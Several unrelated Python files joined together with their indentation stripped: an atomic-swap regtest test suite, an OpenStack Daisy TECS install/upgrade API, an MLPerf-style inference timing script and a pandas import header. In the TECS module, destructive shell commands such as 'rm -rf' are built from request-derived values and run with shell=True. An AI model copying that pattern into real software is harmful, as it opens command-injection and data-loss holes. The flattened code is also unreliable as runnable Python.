rv = callSwapTool(ID_ALICE_SWAP, 'redeemblocktx', str_param=xmr_addr_alice1)
print('redeemblocktx', rv)
self.callxmrnodewallet(ID_ALICE_XMR, 'close_wallet')
self.callxmrnodewallet(ID_ALICE_XMR, 'open_wallet', {'filename': 'testwallet'})
logging.info('Waiting for Alice\'s XMR to confirm...')
num_tries = 120
for i in range(num_tries + 1):
rv = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')
if rv['balance'] > 0 and rv['blocks_to_unlock'] == 0:
break
r = callrpc_xmr_na(XMR_BASE_RPC_PORT + ID_ALICE_XMR, 'get_block_count')
print('XMR blocks', r['count'])
if i >= num_tries:
raise ValueError('Balance not confirming on node {}'.format(ID_ALICE_XMR))
time.sleep(2)
logging.info('Waiting for Bob\'s BTC to confirm...')
for i in range(num_tries + 1):
rv = callnoderpc(ID_BOB_BTC, 'getbalances')
if rv['mine']['trusted'] > 0:
break
print('btc height', i, callnoderpc(ID_BOB_BTC, 'getblockchaininfo')['blocks'])
if i >= num_tries:
raise ValueError('Balance not confirming on node {}'.format(ID_ALICE_XMR))
time.sleep(1)
def test_02_leader_recover_a_lock_tx(self):
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_02_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_02_bob_swap_state') + '.json'
alice_btc_start = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
bob_btc_start = make_int(callnoderpc(ID_BOB_BTC, 'getbalances')['mine']['trusted'])
alice_xmr_start = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')['balance']
bob_xmr_start = self.callxmrnodewallet(ID_BOB_XMR, 'get_balance')['balance']
logging.info('Test start wallet states:\nalice_btc_start: %ld\nbob_btc_start: %ld\nalice_xmr_start: %ld\nbob_xmr_start: %ld',
alice_btc_start, bob_btc_start, alice_xmr_start, bob_xmr_start)
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 2, 3)
logging.info('Alice creates the script-chain lock and refund txns and signs the refund tx, sends to Bob.')
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
logging.info('Bob verifies the txns and signs the refund tx and creates an encrypted signature for the refund spend tx encumbered by Alice\'s coin B key share.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
logging.info('Alice verifies the signature and encrypted signature from Bob.')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
logging.info('Creates the lock spend tx and signs an encrypted signature encumbered by Bob\'s coin B key share')
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
logging.info('Publishes the script-chain lock tx.')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx').strip()
# Wait for the mining node to receive the tx
for i in range(10):
try:
callnoderpc(0, 'getrawtransaction', [a_lock_txid])
break
except Exception as e:
print('Waiting for node 0 to see tx', str(e))
time.sleep(1)
logging.info('Bob stops responding here.')
alice_btc = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
logging.info('alice_btc %ld', alice_btc)
alockrefundtxid = None
for i in range(10):
callnoderpc(0, 'generatetoaddress', [30, self.btc_addr])
time.sleep(1)
logging.info('BTC blocks: %d', callnoderpc(ID_ALICE_BTC, 'getblockchaininfo')['blocks'])
try:
alockrefundtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundtx')
break
except Exception as e:
print(str(e))
if 'Transaction already in block chain' in str(e):
break
assert('non-BIP68-final' in str(e))
assert(alockrefundtxid is not None)
logging.info('alockrefundtxid %s', alockrefundtxid)
# Import key to receive refund in wallet. Simple method for testing.
kal = callSwapTool(ID_ALICE_SWAP, 'getkal')
kal_wif = bytes_to_wif(h2b(kal))
callnoderpc(ID_ALICE_BTC, 'importprivkey', [kal_wif, 'swap refund'])
alockrefundspendtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundspendtx')
rv = callnoderpc(ID_ALICE_BTC, 'getbalances')
alice_btc_end = make_int(rv['mine']['trusted']) + make_int(rv['mine']['untrusted_pending'])
logging.info('alice_btc_end %ld', alice_btc_end)
assert(alice_btc_end > alice_btc)
def test_03_follower_recover_a_lock_tx(self):
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_03_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_03_bob_swap_state') + '.json'
alice_btc_start = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
bob_btc_start = make_int(callnoderpc(ID_BOB_BTC, 'getbalances')['mine']['trusted'])
alice_xmr_start = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')['balance']
bob_xmr_start = self.callxmrnodewallet(ID_BOB_XMR, 'get_balance')['balance']
logging.info('Test start wallet states:\nalice_btc_start: %ld\nbob_btc_start: %ld\nalice_xmr_start: %ld\nbob_xmr_start: %ld',
alice_btc_start, bob_btc_start, alice_xmr_start, bob_xmr_start)
# Same steps as in test_01_swap_successful
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 3, 4)
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx').strip()
logging.info('Alice stops responding here.')
# Wait for the mining node to receive the tx
for i in range(10):
try:
callnoderpc(0, 'getrawtransaction', [a_lock_txid])
break
except Exception as e:
print('Waiting for node 0 to see tx', str(e))
time.sleep(1)
logging.info('Mining 200 blocks.')
callnoderpc(0, 'generatetoaddress', [200, self.btc_addr])
time.sleep(2)
logging.info('BTC blocks: %d', callnoderpc(ID_BOB_BTC, 'getblockchaininfo')['blocks'])
a_lock_refund_txid = callSwapTool(ID_BOB_SWAP, 'publishalockrefundtx').strip()
logging.info('a_lock_refund_txid %s', a_lock_refund_txid)
# Wait for the mining node to receive the tx
for i in range(10):
try:
callnoderpc(0, 'getrawtransaction', [a_lock_refund_txid])
break
except Exception as e:
print('Waiting for node 0 to see tx', str(e))
time.sleep(1)
logging.info('Mining 200 blocks.')
callnoderpc(0, 'generatetoaddress', [200, self.btc_addr])
time.sleep(2)
btc_addr_bob = callnoderpc(ID_BOB_BTC, 'getnewaddress', ['bob\'s addr', 'bech32'])
ignr, a_pkhash_f = segwit_addr.decode('bcrt', btc_addr_bob)
time.sleep(1)
alockrefundspendtxid = callSwapTool(ID_BOB_SWAP, 'publishalockrefundspendftx', str_param=bytes(a_pkhash_f).hex())
rv = callnoderpc(ID_BOB_BTC, 'getbalances')
print('getbalances', dumpj(rv))
bob_btc_end = make_int(rv['mine']['trusted']) + make_int(rv['mine']['untrusted_pending'])
logging.info('bob_btc_end %ld', bob_btc_end)
assert(bob_btc_end > bob_btc_start)
def test_04_follower_recover_b_lock_tx(self):
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_04_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_04_bob_swap_state') + '.json'
alice_btc_start = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
bob_btc_start = make_int(callnoderpc(ID_BOB_BTC, 'getbalances')['mine']['trusted'])
alice_xmr_start = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')['balance']
bob_xmr_start = self.callxmrnodewallet(ID_BOB_XMR, 'get_balance')['balance']
logging.info('Test start wallet states:\nalice_btc_start: %ld\nbob_btc_start: %ld\nalice_xmr_start: %ld\nbob_xmr_start: %ld',
alice_btc_start, bob_btc_start, alice_xmr_start, bob_xmr_start)
# Same steps as in test_01_swap_successful
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 3, 4)
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx').strip()
logging.info('Bob verifies the lock spend tx and encrypted signature from Alice.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg4f)
logging.info('Bob waits for the script-chain lock tx to confirm.')
num_tries = 30
for i in range(1 + num_tries):
rv = callSwapTool(ID_BOB_SWAP, 'confirmalocktx')
print('confirmalocktx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock tx to confirm.')
logging.info('Then publishes the second-chain lock tx.')
b_lock_txid = callSwapTool(ID_BOB_SWAP, 'publishblocktx')
logging.info('Alice waits for the scriptless-chain lock tx to confirm.')
num_tries = 120
for i in range(1 + num_tries):
rv = callSwapTool(ID_ALICE_SWAP, 'confirmblocktx')
print('confirmblocktx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for scriptless-chain lock tx to confirm.')
time.sleep(2)
logging.info('Alice detects a problem with the scriptless-chain lock tx and decides to cancel the swap')
callnoderpc(0, 'generatetoaddress', [150, self.btc_addr])
time.sleep(2)
logging.info('BTC blocks: %d', callnoderpc(ID_ALICE_BTC, 'getblockchaininfo')['blocks'])
alockrefundtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundtx')
# Import key to receive refund in wallet. Simple method for testing.
kal = callSwapTool(ID_ALICE_SWAP, 'getkal')
kal_wif = bytes_to_wif(h2b(kal))
callnoderpc(ID_ALICE_BTC, 'importprivkey', [kal_wif, 'swap refund'])
alockrefundspendtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundspendtx')
rv = callnoderpc(ID_ALICE_BTC, 'getbalances')
print('getbalances', dumpj(rv))
alice_btc = make_int(rv['mine']['trusted']) + make_int(rv['mine']['untrusted_pending'])
logging.info('alice_btc %ld', alice_btc)
logging.info('Bob waits for Alice to spend the lock refund tx.')
num_tries = 20
for i in range(1 + num_tries):
rv = callSwapTool(ID_BOB_SWAP, 'findalockrefundspendtx')
print('findalockrefundspendtx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock refund spend tx to confirm.')
time.sleep(1)
logging.info('Then he can recover his scriptless-chain lock tx coin.')
self.callxmrnodewallet(ID_BOB_XMR, 'open_wallet', {'filename': 'testwallet'})
xmr_addr_bob = self.callxmrnodewallet(ID_BOB_XMR, 'get_address')['address']
rv = callSwapTool(ID_BOB_SWAP, 'redeemblocktx', str_param=xmr_addr_bob)
print('redeemblocktx', rv)
self.callxmrnodewallet(ID_BOB_XMR, 'close_wallet')
self.callxmrnodewallet(ID_BOB_XMR, 'open_wallet', {'filename': 'testwallet'})
if __name__ == '__main__':
unittest.main()
|
api.py
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
/install endpoint for tecs API
"""
import os
import copy
import subprocess
import time
import commands
import traceback
import webob.exc
from oslo_config import cfg
from oslo_log import log as logging
from webob.exc import HTTPBadRequest
from webob.exc import HTTPForbidden
from webob.exc import HTTPServerError
import threading
from threading import Thread
from daisy import i18n
from daisy import notifier
from daisy.api import policy
import daisy.api.v1
from daisy.common import exception
import daisy.registry.client.v1.api as registry
from daisy.api.backends.tecs import config
from daisy.api.backends import driver
from daisy.api.network_api import network as neutron
from ironicclient import client as ironic_client
import daisy.api.backends.os as os_handle
import daisy.api.backends.common as daisy_cmn
import daisy.api.backends.tecs.common as tecs_cmn
import daisy.api.backends.tecs.install as instl
import daisy.api.backends.tecs.uninstall as unstl
import daisy.api.backends.tecs.upgrade as upgrd
try:
import simplejson as json
except ImportError:
import json
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
_LI = i18n._LI
_LW = i18n._LW
tecs_state = tecs_cmn.TECS_STATE
class API(driver.DeploymentDriver):
"""
The hosts API is a RESTful web service for host data. The API
is as follows::
GET /hosts -- Returns a set of brief metadata about hosts
GET /hosts/detail -- Returns a set of detailed metadata about
hosts
HEAD /hosts/<ID> -- Return metadata about an host with id <ID>
GET /hosts/<ID> -- Return host data for host with id <ID>
POST /hosts -- Store host data and return metadata about the
newly-stored host
PUT /hosts/<ID> -- Update host metadata and/or upload host
data for a previously-reserved host
DELETE /hosts/<ID> -- Delete the host with id <ID>
"""
def __init__(self):
super(API, self).__init__()
return
def install(self, req, cluster_id):
"""
Install TECS to a cluster.
param req: The WSGI/Webob Request object
cluster_id:cluster id
"""
tecs_install_task = instl.TECSInstallTask(req, cluster_id)
tecs_install_task.start()
def _get_roles_and_hosts_ip_list(self, req, cluster_id):
host_ha_list = set()
host_ip_list = set()
role_id_list = set()
hosts_id_list = []
hosts_list = []
roles = daisy_cmn.get_cluster_roles_detail(req,cluster_id)
cluster_networks = daisy_cmn.get_cluster_networks_detail(req, cluster_id)
for role in roles:
if role['deployment_backend'] != daisy_cmn.tecs_backend_name:
continue
role_hosts = daisy_cmn.get_hosts_of_role(req, role['id'])
if role_hosts:
for role_host in role_hosts:
host = daisy_cmn.get_host_detail(req, role_host['host_id'])
host_ip = tecs_cmn.get_mngt_network_ip(host, cluster_networks)
if role['name'] == "CONTROLLER_HA":
host_ha_list.add(host_ip)
host_ip_list.add(host_ip)
hosts_id_list.append({host['id']:host_ip})
role_id_list.add(role['id'])
for host in hosts_id_list:
if host not in hosts_list:
hosts_list.append(host)
return (role_id_list, host_ip_list, host_ha_list, hosts_list)
def _query_progress(self, req, cluster_id, action=""):
nodes_list = []
roles = daisy_cmn.get_roles_detail(req)
(role_id_list,host_ip_list,host_ha_list,hosts_list) = self._get_roles_and_hosts_ip_list(req, cluster_id)
for host in hosts_list:
node = {}
host_id = host.keys()[0]
host = daisy_cmn.get_host_detail(req, host_id)
node['id'] = host['id']
node['name'] = host['name']
if 0 == cmp("upgrade", action):
node['os-progress'] = host['os_progress']
node['os-status'] = host['os_status']
node['os-messages'] = host['messages']
if host['status'] == "with-role":
host_roles = [ role for role in roles if role['name'] in host['role'] and role['cluster_id'] == cluster_id]
if host_roles:
node['role-status'] = host_roles[0]['status']
node['role-progress'] = str(host_roles[0]['progress'])
# node['role-message'] = host_roles[0]['messages']
nodes_list.append(node)
return {'tecs_nodes': nodes_list}
def uninstall(self, req, cluster_id):
"""
Uninstall TECS to a cluster.
:param req: The WSGI/Webob Request object
:raises HTTPBadRequest if x-install-cluster is missing
"""
(role_id_list, host_ip_list,host_ha_list, hosts_list) = self._get_roles_and_hosts_ip_list(req, cluster_id)
if role_id_list:
if not host_ip_list:
msg = _("there is no host in cluster %s") % cluster_id
raise exception.ThreadBinException(msg)
unstl.update_progress_to_db(req, role_id_list, tecs_state['UNINSTALLING'], hosts_list, 0.0)
uninstall_progress_percentage = round(1*1.0/len(host_ip_list), 2)*100
threads = []
for host_ip in host_ip_list:
t = threading.Thread(target=unstl.thread_bin,args=(req,host_ip,role_id_list,uninstall_progress_percentage))
t.setDaemon(True)
t.start()
threads.append(t)
LOG.info(_("uninstall threads have started, please waiting...."))
try:
for t in threads:
t.join()
except:
LOG.warn(_("Join uninstall thread %s failed!" % t))
else:
uninstall_failed_flag = False
for role_id in role_id_list:
role = daisy_cmn.get_role_detail(req, role_id)
# if progress is 100, it means some thing is not ready when uninstalling
# here can't use status ==uninstalling or progress==0
if role['progress'] == 100:
unstl.update_progress_to_db(req, role_id_list, tecs_state['UNINSTALL_FAILED'], hosts_list)
uninstall_failed_flag = True
break
if role['status'] == tecs_state['UNINSTALL_FAILED']:
uninstall_failed_flag = True
break
if not uninstall_failed_flag:
LOG.info(_("all uninstall threads have done, set all roles status to 'init'!"))
unstl.update_progress_to_db(req, role_id_list, tecs_state['INIT'], hosts_list)
try:
(status, output) = commands.getstatusoutput('rpm -e --nodeps openstack-packstack\
openstack-packstack-puppet openstack-puppet-modules puppet')
except exception.Invalid as e:
raise HTTPBadRequest(explanation=e.msg, request=req)
def uninstall_progress(self, req, cluster_id):
return self._query_progress(req, cluster_id, "uninstall")
def upgrade(self, req, cluster_id):
"""
update TECS to a cluster.
:param req: The WSGI/Webob Request object
:raises HTTPBadRequest if x-install-cluster is missing
"""
(role_id_list,host_ip_list,host_ha_list,hosts_list) = self._get_roles_and_hosts_ip_list(req, cluster_id)
if role_id_list:
if not host_ip_list:
msg = _("there is no host in cluster %s") % cluster_id
raise exception.ThreadBinException(msg)
unreached_hosts = daisy_cmn.check_ping_hosts(host_ip_list, 1)
if unreached_hosts:
self.message = "hosts %s ping failed" % unreached_hosts
raise exception.NotFound(message=self.message)
daisy_cmn.subprocess_call('rm -rf /root/.ssh/known_hosts')
if os_handle.check_tfg_exist():
os_handle.upgrade_os(req, hosts_list)
unreached_hosts = daisy_cmn.check_ping_hosts(host_ip_list, 30)
if unreached_hosts:
self.message = "hosts %s ping failed after tfg upgrade" % unreached_hosts
raise exception.NotFound(message=self.message)
upgrd.update_progress_to_db(req, role_id_list, tecs_state['UPDATING'], 0.0)
update_progress_percentage = round(1*1.0/len(host_ip_list), 2)*100
threads = []
LOG.info(_("begin to update TECS controller nodes, please waiting...."))
for host_ip in host_ha_list:
LOG.info(_("update TECS controller node %s..." % host_ip))
upgrd.thread_bin(req,host_ip,role_id_list,update_progress_percentage)
LOG.info(_("begin to update TECS other nodes, please waiting...."))
for host_ip in (host_ip_list - host_ha_list):
t = threading.Thread(target=upgrd.thread_bin,args=(req,host_ip,role_id_list,update_progress_percentage))
t.setDaemon(True)
t.start()
threads.append(t)
try:
for t in threads:
t.join()
except:
LOG.warn(_("Join update thread %s failed!" % t))
else:
update_failed_flag = False
for role_id in role_id_list:
role = registry.get_role_metadata(req.context, role_id)
# if progress is 0, it means some thing is not ready when updating
# here can't use status ==updating or progress==100
if role['progress'] == 0:
upgrd.update_progress_to_db(req, role_id_list, tecs_state['UPDATE_FAILED'])
update_failed_flag = True
break
if role['status'] == tecs_state['UPDATE_FAILED']:
update_failed_flag = True
break
if not update_failed_flag:
LOG.info(_("all update threads have done, set all roles status to 'active'!"))
upgrd.update_progress_to_db(req, role_id_list, tecs_state['ACTIVE'])
def upgrade_progress(self, req, cluster_id):
return self._query_progress(req, cluster_id, "upgrade")
def export_db(self, req, cluster_id):
"""
Export daisy db data to tecs.conf and HA.conf.
:param req: The WSGI/Webob Request object
:raises HTTPBadRequest if x-install-cluster is missing
"""
(tecs_config, mgnt_ip_list) = instl.get_cluster_tecs_config(req, cluster_id)
config_files = {'tecs_conf':'','ha_conf':''}
tecs_install_path = "/home/tecs_install"
tecs_config_file = ''
if tecs_config:
cluster_conf_path = tecs_install_path + "/" + cluster_id
create_cluster_conf_path = "rm -rf %s; mkdir %s" % (cluster_conf_path, cluster_conf_path)
daisy_cmn.subprocess_call(create_cluster_conf_path)
config.update_tecs_conf(tecs_config, cluster_conf_path)
get_tecs_conf = "ls %s|grep tecs.conf" % cluster_conf_path
obj = subprocess.Popen(get_tecs_conf, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdoutput, erroutput) = obj.communicate()
tecs_conf_file = ""
if stdoutput:
tecs_conf_file = stdoutput.split('\n')[0]
config_files['tecs_conf'] = cluster_conf_path + "/" + tecs_conf_file
get_ha_conf_cmd = "ls %s|grep HA_1.conf" % cluster_conf_path
obj = subprocess.Popen(get_ha_conf_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdoutput, erroutput) = obj.communicate()
ha_conf_file = ""
if stdoutput:
ha_conf_file = stdoutput.split('\n')[0]
config_files['ha_conf'] = cluster_conf_path + "/" + ha_conf_file
return config_files
|
no_loadgen.py
|
#!/usr/bin/env python3
import threading
import dataset
import argparse
import coco
import imagenet
import os
import argparse
import time
import cli_colors
import multiprocessing as mp
import pandas as pd
from queue import Queue
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_pytorch":
(imagenet.Imagenet, dataset.pre_process_imagenet_pytorch, dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False, 0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True, 0.05),
{"image_size": [1200, 1200, 3], "use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3], "use_label_map": False}),
}
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True,
help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument(
"--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument(
"--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
)
parser.add_argument("--max-batchsize", type=int,
help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument(
"--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(),
type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true",
help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true",
help="enable finding peak performance pass")
parser.add_argument("--debug", action="store_true",
help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument(
"--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf",
help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float,
help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int,
help="mlperf multi-stream sample per query")
parser.add_argument("--model-threads", type=int, default=0,
help="the number of threads the model should run for inferencing a single query")
parser.add_argument("--clients", type=int, default=1,
help="the number of clients/processes")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
return args
def main():
args = get_args()
backend = get_backend("onnxruntime")
image_format = args.data_format if args.data_format else backend.image_format()
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
cli_colors.color_print("Building Dataset", cli_colors.YELLOW, cli_colors.MOD_BOLD)
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count = args.count,
**kwargs)
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs, threads=args.model_threads)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
count = ds.get_item_count()
query_size = args.samples_per_query
cli_colors.color_print(f"Total Samples: {count}, Query Size: {query_size}", cli_colors.YELLOW_SHADE2)
inference_time = []
def handle_tasks(tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
s = time.time()
model.predict(qitem)
e = time.time()
inference_time.append((e-s))
tasks_queue.task_done()
ds.load_query_samples(list(range(count)))
queries = Queue()
for i in range(0, count, query_size):
img, _ = ds.get_samples(list(range(i, i+query_size)))
queries.put({backend.inputs[0]: img})
workers = []
for i in range(args.clients):
worker = threading.Thread(target=handle_tasks, args=(queries,))
worker.daemon = True
workers.append(worker)
queries.put(None)
worker.start()
for w in workers:
w.join()
print(queries.qsize())
ds.unload_query_samples(None)
df = pd.DataFrame(inference_time)
df.to_csv("inference_times.csv")
if __name__ == "__main__":
main()
|
testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas.compat import _get_lzma_file, _import_lzma, raise_with_traceback
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
